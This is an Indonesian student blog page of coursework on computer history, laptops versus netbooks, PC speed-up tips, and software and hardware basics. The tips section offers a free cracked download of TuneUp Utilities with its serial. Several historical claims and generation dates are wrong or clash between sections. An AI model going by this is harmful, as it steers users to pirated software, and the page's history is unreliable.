     Pada tahun 1948, penemuan transistor sangat mempengaruhi perkembangan komputer. Transistor menggantikan tabung vakum di televisi, radio, dan komputer. Akibatnya, ukuran mesin-mesin elektrik berkurang drastis. Transistor mulai digunakan di dalam komputer mulai pada tahun 1956. Penemuan lain yang berupa pengembangan memori inti-magnetik membantu pengembangan komputer generasi kedua yang lebih kecil, lebih cepat, lebih dapat diandalkan, dan lebih hemat energi dibanding para pendahulunya. Mesin pertama yang memanfaatkan teknologi baru ini adalah superkomputer.IBM membuat superkomputer bernama Stretch, dan Sprery-Rand membuat komputer bernama LARC. Komputer-komputer ini, yang dikembangkan untuk laboratorium energi atom, dapat menangani data dalam jumlah yang besar. Mesin tersebut sangat Mahal dan cenderung terlalu kompleks untuk kebutuhan komputasi bisnis, sehingga membatasi kepopulerannya. Hanya ada dua LARC yang pernah dipasang dan digunakan: satu di Lawrence Radiation Labs di Livermore, California, dan yang lainnya di US Navy Research and Development Center di Washington D.C. Komputer generasi kedua Menggantikan bahasa mesin dengan bahasa assembly. Bahasa assembly adalah bahasa yang menggunakan singkatan-singakatan untuk menggantikan kode biner. Pada awal 1960-an, mulai bermunculan komputer generasi kedua yang sukses di bidang bisnis, di universitas, dan di pemerintahan.Komputer-komputer generasi kedua ini merupakan komputer yang sepenuhnya menggunakan transistor. Mereka juga memiliki komponen-komponen yang dapat diasosiasikan dengan komputer pada saat ini: printer, penyimpanan dalam disket, memory, sistem operasi, dan program.

• KOMPUTER DEC PDP-8. Salah satu contoh penting komputer pada masa ini adalah IBM 1401 yang diterima secara luas di kalangan industri. Pada tahun 1965, hampir seluruh bisnis-bisnis besar menggunakan komputer generasi kedua untuk memproses informasi keuangan. Program yang tersimpan di dalam komputer dan bahasa pemrograman yang ada di dalamnya memberikan fleksibilitas kepada komputer. Fleksibilitas ini meningkatkan kinerja dengan harga yang pantas bagi penggunaan bisnis. Dengan konsep ini, komputer dapat mencetak faktur pembelian konsumen dan kemudian menjalankan desain produk atau menghitung daftar gaji. Beberapa bahasa pemrograman mulai bermunculan pada saat itu. Bahasa pemrograman Common Business-Oriented Language (COBOL) dan Formula Translator (FORTRAN) mulai umum digunakan. Bahasa pemrograman ini menggantikan kode mesin yang rumit dengan kata-kata, kalimat, dan formula matematika yang lebih mudah dipahami oleh manusia. Hal ini memudahkan seseorang untuk memprogram dan mengatur komputer. Berbagai macam karir baru bermunculan (programmer, analyst, dan ahli sistem komputer). Industri piranti lunak juga mulai bermunculan dan berkembang pada masa komputer generasi kedua ini.

Komputer generasi ketiga ( 1964 - awal 80an )
     Walaupun transistor dalam banyak hal mengungguli tube vakum, namun transistor menghasilkan panas yang cukup besar, yang dapat berpotensi merusak bagian-bagian internal komputer. Batu kuarsa (quartz rock) menghilangkan masalah ini. Jack Kilby, seorang insinyur di Texas Instrument, mengembangkan sirkuit terintegrasi (IC : integrated circuit) di tahun 1958. IC mengkombinasikan tiga komponen elektronik dalam sebuah piringan silikon kecil yang terbuat dari pasir kuarsa. Pada ilmuwan kemudian berhasil memasukkan lebih banyak komponen-komponen ke dalam suatu chip tunggal yang disebut semikonduktor. Hasilnya, komputer menjadi semakin kecil karena komponenkomponen dapat dipadatkan dalam chip. Kemajuan komputer generasi ketiga lainnya adalah penggunaan sistem operasi (operating system) yang memungkinkan mesin untuk menjalankan berbagai program yang berbeda secara serentak dengan sebuah program utama yang memonitor dan mengkoordinasi memori komputer.


Komputer generasi keempat ( awal 80an)
   Setelah IC, tujuan pengembangan menjadi lebih jelas: mengecilkan ukuran sirkuit dan komponenkomponen elektrik. Large Scale Integration (LSI) dapat memuat ratusan komponen dalam sebuah chip. Pada tahun 1980-an, Very Large Scale Integration (VLSI) memuat ribuan komponen dalam sebuah chip tunggal. Ultra-Large Scale Integration (ULSI) meningkatkan jumlah tersebut menjadi jutaan. Kemampuan untuk memasang sedemikian banyak komponen dalam suatu keping yang berukurang setengah keping uang logam mendorong turunnya harga dan ukuran komputer. Hal tersebut juga meningkatkan daya kerja, efisiensi dan keterandalan komputer. Chip Intel 4004 yang dibuat pada tahun 1971 membawa kemajuan pada IC dengan meletakkan seluruh komponen dari sebuah komputer (central processing unit, memori, dan kendali input/output) dalam sebuah chip yang sangat kecil. Sebelumnya, IC dibuat untuk mengerjakan suatu tugas tertentu yang spesifik.Sekarang, sebuah mikroprosesor dapat diproduksi dan kemudian diprogram untuk memenuhi seluruh kebutuhan yang diinginkan. Tidak lama kemudian, setiap perangkat rumah tangga seperti microwave oven, televisi, dan mobil dengan electronic fuel injection dilengkapi dengan mikroprosesor. Perkembangan yang demikian memungkinkan orang-orang biasa untuk menggunakan komputer biasa. Komputer tidak lagi menjadi dominasi perusahaanperusahaan besar atau lembaga pemerintah. Pada pertengahan tahun 1970-an, perakit komputer menawarkan produk komputer mereka ke masyarakat umum. Komputerkomputer ini, yang disebut minikomputer, dijual dengan paket piranti lunak yang mudah digunakan oleh kalangan awam. Piranti lunak yang paling populer pada saat itu adalah program word processing dan spreadsheet. Pada awal 1980-an, video game seperti Atari 2600 menarik perhatian konsumen pada komputer rumahan yang lebih canggih dan dapat diprogram.
      Pada tahun 1981, IBM memperkenalkan penggunaan Personal Computer (PC) untuk penggunaan di rumah, kantor, dan sekolah. Jumlah PC yang digunakan melonjak dari 2 juta unit di tahun 1981 menjadi 5,5 juta unit di tahun 1982. Sepuluh tahun kemudian, 65 juta PC digunakan. Komputer melanjutkan evolusinya menuju ukuran yang lebih kecil, dari komputer yang berada di atas meja (desktop computer) menjadi komputer yang dapat dimasukkan ke dalam tas (laptop), atau bahkan komputer yang dapat digenggam (palmtop).
     IBM PC bersaing dengan Apple Macintosh dalam memperebutkan pasar komputer. Apple Macintosh menjadi terkenal karena mempopulerkan sistem grafis pada komputernya, sementara saingannya masih menggunakan komputer yang berbasis teks.Macintosh juga mempopulerkan penggunaan piranti mouse. Pada masa sekarang, kita mengenal perjalanan IBM compatible dengan pemakaian CPU: IBM PC/486, Pentium, Pentium II, Pentium III, Pentium IV (Serial dari CPU buatan Intel). Juga kita kenal AMD k6, Athlon, dsb. Ini semua masuk dalam golongan komputer generasi keempat. Seiring dengan menjamurnya penggunaan komputer di tempat kerja, cara-cara baru untuk menggali potensial terus dikembangkan. Seiring dengan bertambah kuatnya suatu komputer kecil, komputer-komputer tersebut dapat dihubungkan secara bersamaan dalam suatu jaringan untuk saling berbagi memori, piranti lunak, informasi, dan juga untuk dapat saling berkomunikasi satu dengan yang lainnya. Komputer jaringan memungkinkan komputer tunggal untuk membentuk kerjasama elektronik untuk menyelesaikan suatu proses tugas. Dengan menggunakan perkabelan langsung (disebut juga local area network, LAN), atau kabel telepon, jaringan ini dapat berkembang menjadi sangat besar.

Komputer generasi kelima ( masa depan )
    Banyak kemajuan di bidang desain komputer dan teknologi semkain memungkinkan pembuatankomputer generasi kelima. Dua kemajuan rekayasa yang terutama adalah kemampuan pemrosesan paralel, yang akan menggantikan model non Neumann. Model non Neumann akan digantikan dengan sistem yang mampu mengkoordinasikan banyak CPU untuk bekerja secara serempak. Kemajuan lain adalah teknologi superkonduktor yang memungkinkan aliran elektrik tanpa ada hambatan apapun, yang nantinya dapat mempercepat kecepatan informasi. Jepang adalah negara yang terkenal dalam sosialisasi jargon dan proyek komputer generasi kelima. Lembaga ICOT (Institute for new Computer Technology) juga dibentuk untuk merealisasikannya. Banyak kabar yang menyatakan bahwa proyek ini telah gagal, namun beberapa informasi lain bahwa keberhasilan proyek komputer generasi kelima ini akan membawa perubahan baru paradigma komputerisasi di dunia. Kita tunggu informasi mana yang lebih valid dan membuahkan hasil.
 
2. 
 

3.  Perbedaan Notebook dan Netbook.

     Laptop adalah sebutan umum untuk Notebook dan Netbook. Jadi Laptop dapat diartikan sebagai netbook maupun notebook. Atau bisa juga dikatakan Laptop terdiri atas dua jenis yaitu Notebook dan Netbook. Asal katanya tetap sama yaitu merujuk pada komputer yang digunakan di pangkuan (lap).
  • Dari segi ukuran, Netbook biasanya memiliki ukuran yang lebih kecil daripada Notebook. Biasanya berukuran antara 7-12 inci. Nah, sedangkan Notebook sendiri ukurannya lebih besar, biasanya mulai dari 12 inci ke atas.
  • Dari segi performa, Netbook biasanya didesain untuk melakukan kinerja ringan seperti mengolah data Word, spreadsheet (Excel), slide (Powerpoint), internetan, memainkan permainan ringan, dan sebagainya. Sedangkan Notebook, menawarkan performa yang lebih berat, misalnya kecepatan pengolahan data yang lebih cepat dan kemampuan multimedia yang handal.
  • Dari segi harga, Harga Netbook biasanya relatif lebih murah, sekitar 2 jutaan. Sedang Notebook harganya paling tidak ada di kisaran 4 jutaan dengan spesifikasi diatas standar.
  • dari segi penggunaan, Notebook lebih cocok digunakan oleh orang yang bekerja “maksimal”, misalnya untuk proses editing, atau desain kreatif lainnya. Sementara Netbook lebih cocok untuk pengguna yang kegiatannya lebih banyak mengolah data ringan sampai sedang, menjelajah internet, dan menonton video.
Nah, sekarang sudah jelas, kan perbedaan antara Laptop, Notebook, dan Netbook.
 

4. Pengertian Blogger

     Blog merupakan singkatan dari web log adalah bentuk aplikasi web yang menyerupai tulisan-tulisan (yang dimuat sebagai posting) pada sebuah halaman web umum. Tulisan-tulisan ini seringkali dimuat dalam urut terbalik (isi terbaru dahulu baru kemudian diikuti isi yang lebih lama), meskipun tidak selamanya demikian. Situs web seperti ini biasanya dapat diakses oleh semua pengguna Internet sesuai dengan topik dan tujuan dari si pengguna blog tersebut.
 

5. Alamat Blog Saya

alamat blog    : http://ifuller.blogspot.com/
alamat email  : wahyudi.togek@gmail.com
 

6. Isi Alamat Blog Saya

      Blog yang sudah saya buat hanya berisi tentang Tugas-Tugas Mata Kuliah yang sedang saya tempuh di Universitas Muhammadiyah Jember, dan juga Tentang beberapa Artikel yang ingin saya Share dan saya pelajari. 
 
Tugas MK PIK

Faktor Utama Penyebab PC Lambat


     Komputer yang lambat bisa disebabkan oleh faktor internal komputer itu sendiri seperti :
• Processor yang kecepatan prosesnya kecil
• RAM yang kapasitasnya kecil
• Harddisk bad sector

     Bagaimana jika komputer anda memiliki spesifikasi yang besar namun masih juga lambat? Apa yang terjadi?? Berikut ini adalah pengalaman saya dalam mengatasi komputer saya yang lambat. Dan faktor penyebabnya antara lain :
• Harddisk komputer/laptop yang sudah full atau jarang melakukan perawatan harddisk seperti : clean up, disk defragment.
• Komputer/laptop menjalankan terlalu banyak program sehingga kerja processor semakin berat.
• Aplikasi yang terinstall di komputer memerlukan alokasi RAM yang besar seperti : game, video editing.
• Adanya virus dalam di komputer.
Nah kalo sudah begitu keadaannya apa yang harus anda lakukan? Bingung yah? Sama (tapi, itu dulu, hehe)
Kalau anda masih bingung, kali ini saya akan memberikan tips-tips yang telah saya dapatkan melalui pengalaman saya dan telah terbukti berhasil.

• Untuk Harddisk komputer/laptop yang sudah full :
Seperti yang telah saya katakan diatas jika harddisk anda full, sebaiknya anda melakukan backup data yang jarang anda akses. Back up bisa anda buat menggunakan DVD-rom (tentunya yang masih kosong ) karena
selain harga yang murah kapasitas DVD juga lumayan besar untuk penyimpanan data. Dan kalau anda punya uang lebih, anda bisa tambah harddisk anda dengan cara membeli harddisk yang kapasitasnya lebih
besar. Jika anda sudah membuat backup nya anda boleh menghapus file yang ada di dalam komputer anda jadi harddisk bisa lebih ringan deh kerjanya karena ga banyak data yang disimpannya. Bayangkan saja kalau
harddisk anda sudah full terus anda melakukan perintah search untuk mencari file anda, apa yang terjadi?? Tentu proses pencariannya memakan waktu yang lama bukan? Itu disebabkan karena harddisk
membaca satu per satu file dari semua file yang tersimpan di dalam harddisk tersebut dan mencari file yang cocok dengan kategori yang anda masukkan.

• Untuk Harddisk yang ga pernah didefrag (disk defragment)
Bagi anda yang jarang melakukan disk defragment ada 2 alasan yang sangat mendasar untuk tidak melakukan hal ini seperti : malas karena terlalu lama, tidak tau (hehe sok tau juga yah? ) Nah, untuk anda yang belum tau cara melakukan disk defragment disini saya akan memberikan solusi untuk anda, anda bisa melakukan defragment hanya dengan 1 klik saja, bahkan hanya dengan 1 klik saja semua masalah yang ada dalam komputer anda bisa diatasi, mau tau?. Untuk melakukan semua maintenance komputer dengan mudah anda cukup menginstall TuneUp Utility 2009 kenapa? Karena pada menu 1-klik maintenance nya software
ini akan langsung mencari masalah-masalah yang ada di dalam komputer anda mulai dari registry error, temporary files, bahkan disk defragment pun akan dilakukan sekalian, enak bukan? Nah buat anda yang inginendapatkan software ini anda bisa klik di link ini lengkap dengan serialnya, gratis loh TU2009 EN-US.rar jika anda ingin proses downloadnya lebih cepat anda jadi member 4shared, dan nikmati
fasilitas-fasilitasnya.


• Komputer menjalankan program yang terlalu banyak, solusinya kurangi menjalankan program yang tidak perlu dan kurangi menginstall program antivirus yang lebih dari 1, itu juga bisa menyebabkan komputer lambat bahkan bisa-bisa loading komputer menjadi lambat sekali. Anda bisa menggunakan 1 antivirus yang menurut anda handal. Kalau untuk saya antivirus yang saya gunakan itu avast antivirus karena antivirus ini
cukup handal untuk komputer/laptop yang terhubung ke internet. Biasanya untuk browser tertentu memiliki lubang keamanan yang bisa dimasuki oleh virus dan avast bisa mendeteksi virus tersebut bahkan
pada keadaan online maupun offline. Untuk virus local anda bisa menggunakan ansav, pcmav, maupun smandav. Semua tergantung anda.

• Aplikasi yang terinstall di komputer memerlukan alokasi RAM yang besar :
Ini biasanya kita temui pada game-game pc, faktor yang menyebabkan game lambat/bahkan macet adalah tidak hanya RAM yang kecil, kemungkinan itu ada sangkut pautnya dengan VGA card anda. Untuk
game yang memiliki grafik yang tinggi biasanya game tersebut memerlukan kapasitas RAM, Harddisk, Processor, dan VGA card yang tinggi juga. Kalo diantara salah satu komponen diatas ada yang masih
standar, ya wajar saja kalo game anda macet. Solusinya tambah saja VGA card anda dengan kapasitas yang lebih besar. Atau kalo RAM anda itu lebih dari 1 Gb anda bisa shared ke VGA lewat BIOS. Nah, untuk masalah RAM anda bisa menaikkan virtual memory untuk membantu RAM.
Pengaturan ini bisa anda lakukan melalui menu My Computer > Properties > Advanced > Performance, klik Settings lalu pilih Advanced > Virtual Memory > klik Change > Setting lebih besar dari sebelumnya lalu
klik Set dan OK! Restart komputer anda.

• Untuk masalah virus yang ada dikomputer anda, anda bisa update antivirus anda dan lakukan scaning pada harddisk anda.
Maju terus pendidikan Indonesia! Good Luck!


Penjelasan CPU dan Memory


Central Processing Unit (CPU)
     CPU merupakan otak sistem komputer, dan memiliki dua bagian fungsi operasional, yaitu : ALU (Arithmatical Logical Unit) sebagai pusat pengolah data, dan CU (Control Unit) sebagai pengontrol kerja komputer. CPU merupakan tempat memroses instruksi-instruksi program, yang pada komputer micro disebut micro processor (pemroses mikro). Pemroses ini berupa chip yang terdiri dari ribuan hingga jutaan IC. Dalam dunia dagang, pemroses ini diberi nama sesuai dengan keinginan pembuatnya pada umumnya ditambah dengan nomor seri, misalnya dikenal pemroses Intel 80486 DX2- 400 (buatan intel dengan seri 80486 DX2-400 yang dikenal dengan komputer 486-DX2), Intel pentium 100 (dikenal dengan komputer pentium I), Interl pentium II-350, Intel pentium III-450, Intel Celeron 333, AMD K-II dan sebagainya. Masing-masing produk ini memiliki kelebihan dan kekurangan masing-masing.

MemoriRandom Access Memory (RAM)
     Semua data dan program yang dimasukkan melalui alat input akan disimpan terlebih dahulu di memori utama, khususnya RAM yang dapat diakses secara acak (dapat diisi/ditulisi/diambil/dihapus isinya) oleh pemrogram. Struktur RAM terbagi menjadi 4 bagian utama yaitu :

1. Input Storage, digunakan untuk menampung input yang dimasukkan melalui alat input.
2. Program Storage, digunakan untuk menyimpan semua instruksi-instruksi program yang akan diakses.
3. Working Storage, digunakan untuk menyimpan data yang akan diolah dan hasil pengolahan.
4. Output Storage, digunakan untuk menampung hasil akhir dari pengolahan data yang akan ditampilkan ke alat output.

     Input yang akan dimasukkan melalui alat input akan ditampung terlebih dahulu di input storage. Bila input tersebut berupa program maka akan dipindahkan ke program storage, dan bila berbentuk data maka akan dipindahkan ke working storage. Hasil dari pengolahan juga ditampung terlebih dahulu di working storage dan bila akan ditampilkan ke alat output maka hasil tersebut dipindahkan ke output storage.

Read Only Memory (ROM)
     Read Only Memory (ROM) hanya dapat dibaca sehingga pemrogram tida bisa mengisi sesuatu ke dalam ROM. ROM sudah diisi oleh pabrik pembuatnya berupa sistem operasi yang terdiri dari program-program pokok yang diperlukan oleh sistem komputer., seperti misalnya program untuk mengatur tampilan karakter di layar, pengisian tombol kunci keyboard untuk keperluan kontrol tertentu, dan bootstrap program. Program bootstrap diperlukan pada saat pertama kali sistem komputer diaktifkan. Proses mengaktifkan komputer pertama kali disebut dengan booting, yang dapat berupa cold booting atau warm booting.
     Cold booting merupakan proses mengaktifkan sistem komputer pertama kali untuk mengambil program bootstrap dari keadaan listrik komputer mati (off) menjadi hidup (on). Sedangkan warm booting merupakan proses pengulangan pengambilan program bootstrap pada saat komputer masih hidup dengan cara menekan ketiga tombol pada keyboard sekaligus yaitu ,Ctrl + Alt + del. Proses ini biasanya dilakukan pada saat sistem komputer macet (hang) daripada harus mematikan aliran arus listrik komputer dan menghidupkannya kembali.
     Instruksi-instruksi yang tersimpan di ROM disebut dengan microinstruction atau firmware karena hardware dan software dijadikan satu oleh pabrik pembuatnya. Isi dari ROM ini tidak boleh hilang atau rusak karena bila terjadi demikian, maka sistem komputer tidak akan bisa berfungsi. Oleh karena itu, untuk mencegahnya maka pabrik pembuatnya merancang ROM sedemikian rupa sehingga hanya bisa dibaca, tidak dapat diubah-ubah isinya oleh orang lain. Selain itu, ROM bersifat non-volatile supaya isinya tidak hilang bila listrik komputer dimatikan.

Senin, 08 Oktober 2012

Tugas MK " Pengenalan Ilmu Komputer "

SOFTWARE( Perangkat Lunak )


Pengertian :
  1. Software adalah segala macam jenis program yang digunakan untuk mengoperasikan computer dan peralatanya ( hardware ).
  2. Software merupakan salah satu penunjang system komputerisasi yang tidak dapat disentuh langsung atau bersifat virtual.
  3. Software adalah salah satu komponen computer yang menjadi perantara antara Brainware dengan Hardware agar dapat saling berinteraksi.
          Jadi scara garis besar Software adalah kumpulan instruksi yang berfungsi untuk menjalankan suatu perintah, seperti memberikan informasi tentang hardware, menentukan fungsi hardware, dan menjalankan sistem.

Fungsi Software ( Perangkat Lunak )
  • Sebagai media perantara antara user dengan hardware.

Sejarah dan Perkembangan Software

             Sejarah perkembangan komputer dapat dikelompokkan menjadi 2 bagian, yaitu :

1. Software Sebelum Komputer Generasi Pertama
 
  • Pada tahun 300 SM, bangsa Yunani menciptakan suatu system komunikasi yang disebut dengan polybius telegraph. System itu menggunakan obor untuk mengirim berita dari suatu tempat ke tempat lain.
  • Tahun 1842 perangkat lunak pertama muncul yang ditulis oleh Ada Augusta, anak perempuan dari Lord Byron. Software ini diterapkan pada Analytical Engine ciptaan Charles Babbage.
  • Tahun 1933 Wallace J. Eckert menciptakan suatu program mekanik yang dipergunakan mengontrol jalannya suatu mesin yang merupakan gabungan dari beberapa mesin akuntansi. 

2. Software Semasa Komputer Generasi Pertama
  • Software pada generasi ini diciptakan oleh para ahli matematika dan ahli teknik yang digunakan untuk menyelesaikan problem yang muncul pada bidangnya. Program yang dibuat bersifat khusus karena hanya untuk satu aplikasi tertentu sehingga jika ingin digunakan untuk aplikasi lain, maka program yang baru harus dibuat lagi.
  • Untuk mengatasi kesulitan tersebut, maka orang menciptakan suatu bahasa pemrograman yang disebut bahasa tingkat tinggi. Dengan bahasa tingkat tinggi dilakukan dengan cara menulis program dalam bahasa Inggris yang diterjemahkan ke dalam bahasa mesin.
  • Komputer hanya sebagai alat yang dapat mengerjakan perintah yang diberikan oleh manusia. Bahasa yang diberikan ini menggunakan bahasa komputer.
      Bahasa komputer terdiri dari beratusan macam. Setiap bahasa mempunyai cirri-ciri tersendiri yang sesuai dengan bidangnya, seperti :
  • Bahasa Cobol (Common Bussiness Oriented Language) digunakan untuk masalah peradagangan.
  • FORTRAN (Formula Translator) digunakan untuk penyelesaian matematika.
  • BASIC (Beginner’s All Purpose Symbolic Instruction Code) digunkaan untuk perhitungan matematika dan perhitungan dagang yang sederhana.
Ada beberapa aplikasi pemrograman yang sering dipergunakan, seperti :
     Pengolah kata, perhitungan kolom dan lajur, serta untuk perhitungan statistuk dan lain-lain. Untuk mengatasai agar jangan terlalu sering menulis ulang program, dibuat suatu paket program untuk penolah kata, paket program untuk perhitungan kolom dan lajur, paket program untuk perhitungan statistik dan sebagainya.
      
Pembuat paket program pengolah kata cukup banyak, misalnya :
       WordStar, Microsoft Word dan Word Perfect, Chi Writer dan lain-lain.
Jenis-jenis program aplikasi adalah :
  • Microsoft Excel
          Untuk menyelesaikan masalah perhitungan yang terdiri dari baris dan kolom.
  • b. Microsoft Power Point
          Untuk menyelesaikan masalah yang berhubungan dengan presentasi.
  • Microsoft Acces
          Untuk menyelesaikan masalah pengolahan data/database.
  • CAD (Computer Aided Design)
         Untuk menangani bidang ilmu pengetahuan dan teknologi, seperti : merancang gedung, merancang bentuk mobil dan sebagainya.
  • DecEasy Accounting
     Untuk menyelesaikan masalah perhitungan/pelaporan dalam bidang akuntansi dan sebagainya.



HARDWARE( Perangkat Keras )

 


Pengertian :

        Hardware merupakan salah satu bagian dari komputer. Jenis - jenis hardware antara lain memory, hard disk, motherboard, mouse, keyboard, dll. Masing - masing hardware yang terdapat pada komputer telah mempunyai tugas sendiri-sendiri sehingga menghasilkan sebuah sistem komputer yang utuh dan bekerja dengan baik. Seiring dengan perkembangan tekhnologi, semakin banyak pula hardware yang terdapat di pasaran, terutama yang berhubungan dengan internet dan multimedia.
 

 Sejarah dan Perkembangan Hardware
Komputer dari sejak awal dibuatnya, hingga kini banyak mengalami perubahan dan penyempurnaan bentuk dan fungsinya. Pada tahun 1930, lahirlah suatu konsep dari komputer-komputer seba guna yang menjadi awal dari komputer modern saat ini. Ditambah lagi dengan perkembangan masyarakat yang makin kompleks dan dengan kemajuan teknologi yang telah mendorong orang-orang berbakat untuk berpikir secara pesat. Pada tahun 1937, Alan Turin seorang ahli matematika bangsa Inggris membuat sebuah analisis teoritis dari kemungkinan pengembangan komputer yang serba guna. Pelaksanaan gagasan tersebut dapat segera terwujud, karena pada Perang Dunia II pihak militer sangat membutuhkan perhitungan-perhitungan yang cepat, matang, dan akurat untuk kebutuhan perang, sehingga dari gagasan tersebut perkembangan perangkat keras (hardware) mengalami perubahan bentuk dan fungsinya, dan perangkat lunak (software) mengalami perkembangan penggunaannya menjadi program yang mudah digunakan.

A. Perkembangan Hardware
         Kemajuan teknologi yang dibuat manusia telah mengubah bentuk dan fungsi komputer tersebut dalam beberapa generasi, yaitu :

1. Generasi Pertama (1946-1959)
Komputer generasi pertama dibuat masih sangat sederhana dan belum kompleks penggunaannya, sehingga komputer generasi pertama belum dapat memproses masalah-masalah yang besar. Komputer dalam prosesnya serta pembuatnya masih menggunakan komponen yang besar-besar.

Adapun ciri-ciri komputer generasi pertama, antara lain :
a. Ukuran fisiknya besar.
b. Kecepatan prose lambat.
c. Cepat panas.
d. Membutuhkan listrik yang besar.
e. Menggunakan tabung hampa udara (Vaccum tube).
f. Memorinya menggunakan Magnetic Core Storage.
g. Masih menggunakan bahasa mesin (Machine Language).
h. Menggunakan konsep Stored Program.

Contoh komputer generasi pertama :
  • MARK I, MARK II, IBM 702, IBM 704, IBM 709 (dibuat oleh IBM/International Business Machine). 
  • UNIVAC II (dibuat oleh Sperry Rand). 
  • ENIAC (Electronic Numerical Integrator and Calculator), dibuat oleh DR. John W. Mauchly pada tahun 1942. Komputer ini berukuran besar dan berat fisiknya mencapai 30 ton. 
  • SEC (Simple Electronic Computer), dibuat oleh Electronic Computation Laboratory of Birkbeck College pada tahun 1951. 
  • Datamatic 1000 (dibuat oleh Honeywell). 
  • NCR 102A, NCR 102D (dibuat oleh National Cash Register).

2. Generasi Kedua (1959-1965)
Pembuatan komputer generasi kedua ini merupakan pengembangan dari komputer generasi pertama yang dibuat untuk menyempurnakan bentuk dari komponen dan penggunaan listrik yang lebih hemat.

Komputer generasi kedua mempunyai ciri-ciri sebagai berikut :
a. Komponen telah menggunakan transistor.
b. Ukuran fisiknya lebih kecil.
c. Kecepatan prosesnya lebih cepat.
d. Tidak cepat panas.
e. Membutuhkan listrik lebih sedikit.
f. Memori yang digunakan lebih besar.
g. Telah menggunakan bahasa tingkat tinggi (high level language).
h. Sudah dapat digunakan untuk real time (informasi yang dibutuhkan dapat dihasilkan dengan sekejap) dan time sharing (komputer digunakan bersama-sama dan komputer dapat membagi waktu untuk tiap-tiap pemakai).

Contoh komputer generasi kedua :
  • IBM 7070, IBM 7080, IBM 1400, IBM 1600 (dibuat oleh IBM/International Business Machine). 
  • Honeywell 400, Honeywell 800 (dibuat oleh Honeywell). 
  • Burroughs 200 (dibuat oleh Burroughs). 
  • GE 635, GE 645, GE 200 (dibuat oleh General Electric). 
  • UNIVAC III, UNIVAC SS80, UNIVAC SS90, UNIVAC 1107 (dibuat oleh Sperry Rand). 
  • NCR 300 (dibuat oleh National Cash Register).

3. Generasi Ketiga (1965-1970)
Komputer generasi ketiga dibuat dengan menggabungkan beberapa komponen dalam satu tempat dan disempurnakan tampilan dari komputer tersebut. Selain itu, komputer generasi ketiga telah dibuat penyimpanan memorinya lebih besar dan diletakkan di luar (eksternal) penggunaan listriknya lebih hemat dibandingkan komputer generasi kedua dan ukuran fisiknya dibuat menjadi lebih kecil, agar dapat menghemat penggunaan ruang.

Komputer generasi ketiga mempunyai ciri-ciri sebagai berikut :
a. Komponen telah menggunakan IC (Integrated Circuit) atau yang disebut "chip" dalam bentuk Hybrid Integrated Circuits atau Solid Logic Technology (SLT), yaitu transistor dan dioda diletakkan secara terpisah dalam satu tempat.
b. Kecepatan prosesnya lebih cepat.
c. Membutuhkan listrik lebih hemat.
d. Memorinya yang digunakan lebih besar, dapat menyimpan sampai ratusan ribu karakter.
 e. Telah menggunakan penyimpanan luar yang bersifat random access, yaitu magnetik disk yang berkapasitas besar.
f. Dapat digunakan untuk multi processing dan multi programming.
g. Telah dibuatnya alat input-output dengan menggunakan visual display terminal yang dapat menampilkan grafik, dapat menerima dan mengeluarkan suara, dan telah digunakannya alat pembaca tinta magnetik MICR (Magnetic Ink Character Reader).

Contoh komputer generasi ketiga :
  • GE 600, GE 235 (dibuat oleh General Electric). 
  • Burroughs 5700, Burroughs 6700, Burroughs 7700 (dibuat oleh Burroughs). 
  • UNIVAC 1108, UNIVAC 9000 (dibuat oleh Sperry Rand).

4. Generasi Keempat (1970-1995)
Komputer generasi keempat merupakan pengembangan dari komputer generasi ketiga. Komputer ini dibuat dengan menggabungkan beberapa IC yang dipadatkan, yang dalam komputer generasi ketiga belum dapat digabungkan.

Komputer generasi keempat mempunyai ciri-ciri sebagai berikut :
a. Telah menggunakan LSI (Large Scale Integration), yaitu penggabungan beribu-ribu IC yang dipadatkan dalam 1 buah chip.
b. LSI dikembangkan menjadi VLSI (Very Large Scale Integration) yang dapat memuat 150.000 transistor yang dipadatkan.
c. Chip yang digunakan telah berbentuk segi empat yang membuat rangkaian-rangkaian terpadu.

Contoh komputer generasi keempat :
  • IBM 370 (dibuat oleh IBM/International Business Machine). 
  • APPLE II (dibuat oleh Apple).

       Untuk komputer generasi yang akan datang, banyak menggunakan sensor-sensor untuk mempermudah dan mempercepat pekerjaan kita, dan komputer yang akan datang dibuat untuk mempermudah interaksi antara manusia dengan komputer secara langsung yang seakan-akan manusia tersebut berada dalam komputer. Ini dapat terwujud dengan adanya materi kecerdasan buatan (Artificial Intelligent), yaitu suatu peralatan yang dibuat untuk dapat bekerja seperti manusia, sehingga manusia bukan lagi sebagai obyek diluar komputer, melainkan manusia akan dilibatkan langsung sebagai objek di dalam komputer. Hal ini dapat anda lihat dengan dibuatnya sebuah alat untuk simulasi komputer, dimana manusia dengan menggunakan helm khusus agar tampak seperti di dalam komputer. Selain itu, kini telah dibuat robot-robot pengganti tenaga manusia. Pada robot tersebut dibuatkan sensor-sensor pendeteksi rangsangan dari luar dan akan langsung meresponnya seperti layaknya manusia.


 Daftar Pustaka

http://yopyrinaldi.blogspot.com/2009/11/sejarah-perkembangan-hardware-komputer.html
http://carapedia.com/pengertian_definisi_hardware_info2086.html
http://wartawarga.gunadarma.ac.id/2010/01/sejarah-perkembangan-software/
http://jthamrin.wordpress.com/2010/12/17/definisi-software-hardware/

::: Definisi dan Pengertian Software :::



       ada yang bilang “software itu ya program” ada juga yang bilang “software itu Windows, Linux, dll” . Semua jawaban itu tidak ada yang salah. Tapi bagi saya informasi itu masih kurang lengkap. Lalu saya mencari-cari di internet dan banyak sekali website yang mendefinisikan tentang apa itu software.

      Dari sekian banyaknya definisi tersebut, kemudian saya pelajari dan saya kelompokkan dan akhirnya dapat saya simpulkan software dikelompokkan ke dalam 3 pengertian yaitu berdasarkan definisi, jenis dan fungsinya.


Definisi

      Software merupakan hal utama yang harus ada pada komputer kita karena software adalah perangkat lunak berupa program-program yang digunakan untuk menjalankan petunjuk atau perintah-perintah saat menjalankan komputer. Macam dan jenis software juga berbeda-beda, mulai dari software untuk menulis atau untuk mengolah data, software untuk menggambar, software untuk bermain game, dll


